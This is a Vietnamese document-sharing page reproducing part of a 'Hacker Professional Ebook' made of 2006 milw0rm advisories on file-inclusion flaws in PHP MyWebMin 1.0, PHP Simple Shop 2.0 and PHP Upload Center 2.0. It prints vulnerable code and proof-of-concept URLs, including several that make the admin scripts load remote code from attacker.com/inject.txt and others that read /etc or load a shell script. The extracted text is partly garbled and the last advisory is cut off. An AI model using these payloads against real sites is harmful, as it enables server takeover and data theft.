1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 406 doc

6 82 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion
Tác giả Ahmad Maulana a.k.a Matdhule
Trường học Turnkey Web Tools, Inc.
Chuyên ngành Computer Science
Thể loại Báo cáo
Năm xuất bản 2006
Thành phố Jakarta
Định dạng
Số trang 6
Dung lượng 46,35 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

navaroHCE PHP Simple Shop... Solution: ~~~~~~ - Sanitize variable $abs_path on affected files.. Notification: ~~~~~~~~~ I've been contacting the web/software administrator to tell about

Trang 1

#######################################

+PHP MyWebMin 1.0 Remote File Include

+Advisory #5

+Product HP MyWebMin

+Develop:

+http://www.josh.ch/joshch/php-tools/ ,download.html +Vulnerable: Remote File Includes

+Risk:High

+Class:Remote

+Discovered:by Kernel-32

+Contact: kernel-32@linuxmail.org

+Homepage: http://kernel-32.blogspot.com

+Greetz: BeLa

########################################

Vulnerable File:window.php

$ordner = opendir("$target");

?>

and

include("$target/preferences.php");

if($action != "")

{

include("$action.php");

?>

Examples:

http://site/path/window.php?target=/etc

http://site/path/home.php?target=/home

http://site/path/window.php?action=Shell.php

# milw0rm.com [2006-09-28]

Trang 2

navaro(HCE)

PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion

Code:

\_ _/\_ _ \ / | \\ _ \

| )_ / \ \// ~ \/ | \

| \\ \ _\ Y / | \

/ _ / \ /\ _|_ /\ _ /

\/ \/ \/ \/ OR.ID

ECHO_ADV_44$2006

-

[ECHO_ADV_44$2006] PHP Simple Shop <= 2.0 (abs_path) Remote File

Inclusion

-

Author : Ahmad Maulana a.k.a Matdhule

Date Found : August, 07th 2006

Location : Indonesia, Jakarta

web : http://advisories.echo.or.id/adv/adv44-matdhule-2006.txt

Critical Lvl : Highly critical

Impact : System access

Where : From Remote

-

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~

PHP Simple Shop

Application : PHP Simple Shop

version : Latest version [2.0]

URL : http://www.turnkeywebtools.com/phpsimpleshop

Trang 3

-

Vulnerability:

~~~~~~~~~~~~~

In folder admin we found vulnerability script index.php

-index.php -

<?PHP

/*

index.php - $DATE$ - $TIME$ - $VERSION$

PHP Simple Shop

http://www.turnkeywebtools.com/phpsimpleshop/

Copyright (c) 2001-2005 Turnkey Web Tools, Inc

*/

if (isset($abs_path) && $abs_path != "") {

include $abs_path."admin/adminglobal.php";

} else {

include "./adminglobal.php";

}

-

Input passed to the "abs_path" parameter in index.php is not

properly verified before being used This can be exploited to execute arbitrary PHP code by including files from local or external

resources

Also affected files :

adminindex.php

adminglobal.php

login.php

menu.php

header.php

Trang 4

Proof Of Concept:

~~~~~~~~~~~~~~

http://target.com/[phpsimpleshop_path]/admin/index.php?abs_path=http://attacker com/inject.txt?

http://target.com/[phpsimpleshop_path]/admin/adminindex.php?abs_path=http://att acker.com/inject.txt?

http://target.com/[phpsimpleshop_path]/admin/adminglobal.php?abs_path=http://at tacker.com/inject.txt?

http://target.com/[phpsimpleshop_path]/admin/login.php?abs_path=http://attacker com/inject.txt?

http://target.com/[phpsimpleshop_path]/admin/menu.php?abs_path=http://attacker com/inject.txt?

http://target.com/[phpsimpleshop_path]/admin/header.php?abs_path=http://attacke r.com/inject.txt?

Solution:

~~~~~~

- Sanitize variable $abs_path on affected files

Notification:

~~~~~~~~~

I've been contacting the web/software administrator to tell about this hole in his system,

but instead of giving a nice response, he replied so rudely and arrogantly

I recommend not to use this product for your own sake

-

Shoutz:

~~

~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :)

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com

~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net

-

-

Contact:

Trang 5

~~~

matdhule[at]gmail[dot]com

- [ EOF ] -

# milw0rm.com [2006-08-07]

vns3curity(HCE)

PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities

Code:

* Name = PHP Upload Center v2.0 ;

* Class = Remote/Local File Inclusion ;

* Download = http://skrypty.webpc.pl/pobierz.php?id=58 ;

* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ;

-

Vulnerable Code in activate.php

line 66-70

if (!isset($language))

$language=$dft_language;

if ($language=="")

$language=$dft_language;

require("include/${language}.php"); <== Local incl

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN